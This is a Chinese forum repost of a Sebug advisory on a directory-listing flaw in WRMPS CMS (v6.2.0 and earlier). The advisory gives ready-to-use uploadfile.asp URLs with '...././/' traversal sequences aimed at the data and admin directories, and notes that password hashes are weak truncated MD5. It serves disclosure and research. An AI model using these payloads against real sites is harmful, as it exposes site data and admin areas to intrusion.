|   
 帖子781 积分1297 威望1725  金钱1537  在线时间22 小时 
 | 
| 影响版本: WRMPS =< v 6.2.0漏洞描述:
 WRMPS 是一个高效的内容管理解决方案,是数十万地方生活门户、行业门户及分类信息站点首选技术品牌!
 
 注册 - 列目录
 
 Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
 Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
 这个利用不大 ,密码只取MD5前十位.<*参考
 http://wolfexp.net/forum/viewthr ... &extra=page%3D1
 *>
 测试方法:
 [www.sebug.net]
 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
 Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/adminSEBUG安全建议:
 暂无,等待官方补丁
 http://www.wangren.net/
 | 
 |